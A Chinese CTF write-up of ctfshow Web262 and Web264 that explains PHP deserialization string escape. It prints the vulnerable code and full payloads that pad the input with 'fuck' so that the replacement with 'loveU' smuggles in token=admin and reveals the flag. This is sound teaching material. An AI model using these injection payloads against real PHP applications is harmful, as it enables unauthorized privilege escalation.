ctfshow(262,264)--反序列化漏洞--字符串逃逸

Web262

源代码:

index.php:

复制代码
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

message.php:

复制代码
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }

代码审计:

index.php:

传参f,m,t,实例化message类的对象为msg。

msg序列化 ,并且将序列化字符串中的fuck字符全部替换为loveU字符,赋值给usmg。

setcookie函数设置cookie的名为msg,值为base64编码后的usmg

message.php:

当cookie被成功传入后,对cookie的值进行base64解码与反序列化。
若msg对象中的token值为admin,便输出flag.

思路:

本题我们能控制的参数只有f,m,t.

正常给成员变量赋值之后的序列化字符串是这样的:
若我们给成员变量to赋值为3";s:5:"token";s:5:"admin";},序列化之后是这样:
我们利用这种方式控制了token的值,将其修改为了admin。

但是此时to的值的长度为s:28:,因此在反序列化时还是不会将token的值识别为admin,而是user。

因此,我们要让s:28:"3";的双引号中的字符串数量与前面的数量匹配,就要用到字符串逃逸

函数str_replace('fuck', 'loveU', serialize($msg)) ,将fuck替换为loveU,且是在序列化之后再进行替换,因此只会改变字符串的实际长度,但是不会改变表示字符串长度的数字。

复制代码
// 替换前
s:2:"to";s:4:"fuck";
// 替换后
s:2:"to";s:4:"loveU";

每有一个fuck,双引号里的实际字符长度就可以多一个。
s:28:"3";中,实际长度为1,多出的长度为27个,所以我们添加27个fuck,就可以让数字与实际长度匹配,从而误导系统,将我们输入的token作为成员变量处理。

payload:

复制代码
https://defdd8fc-439a-4f81-86c3-9c304ec64b7f.challenge.ctf.show/
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

EXP:

传入f,m,t:

复制代码
https://defdd8fc-439a-4f81-86c3-9c304ec64b7f.challenge.ctf.show/
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

访问message.php,得到flag.

Web264

源代码:

复制代码
error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

message.php:

复制代码
session_start();
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_SESSION['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

代码审计:

与上一题不同在于将Cookie改为了设置Session。

且message.php页面要求设置Cookie:msg的值,没有要求,随便输入即可。

思路:

与262相同。

EXP:

复制代码
?f=1
&m=2
&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck3";s:5:"token";s:5:"admin";}

然后在Cookie中设置msg=1后,访问message.php,得到flag.

相关推荐
其实防守也摸鱼23 分钟前
运维--ip单日获取去重数据量超过500条
运维·学习·tcp/ip·安全·web安全·安全威胁分析·工具
txg66642 分钟前
Agent 攻击 Agent:自动检测 LLM Agent 中的污点式漏洞
人工智能·深度学习·安全·网络安全
解局易否结局3 小时前
鸿蒙人脸检测与活体识别实战:基于 @ohos.visionKit 构建安全身份验证
安全·华为·harmonyos
csdn_aspnet14 小时前
GitHub Actions自动化运维实战,用CI/CD流水线实现测试、部署、安全扫描一体化
运维·安全·ci/cd·自动化·github
ChainSafeAI00316 小时前
以太坊利用AI挖掘漏洞成功发现安全缺陷,称人工审核仍不可替代
人工智能·安全
世***y16 小时前
开展夏季安全大检查 排隐患夯实安全基础
安全
一键生成网站16 小时前
AI原型工具企业需求分析:私有化部署与安全协作选购指南
人工智能·安全·需求分析·
mounter62517 小时前
从内存隔离到运行时防线:透视 Linux 内核安全强化的博弈与演进
linux·网络·安全·linux kernel·kernel
chenyulin454518 小时前
企业微信API二次开发:万级并发回调下的极致幂等性设计与防重放架构实战
大数据·人工智能·安全·架构·企业微信
云水一下19 小时前
零基础玩转 bWAPP 靶场(五):HTML 注入——存储型(博客)
web安全·html·bwapp·存储型注入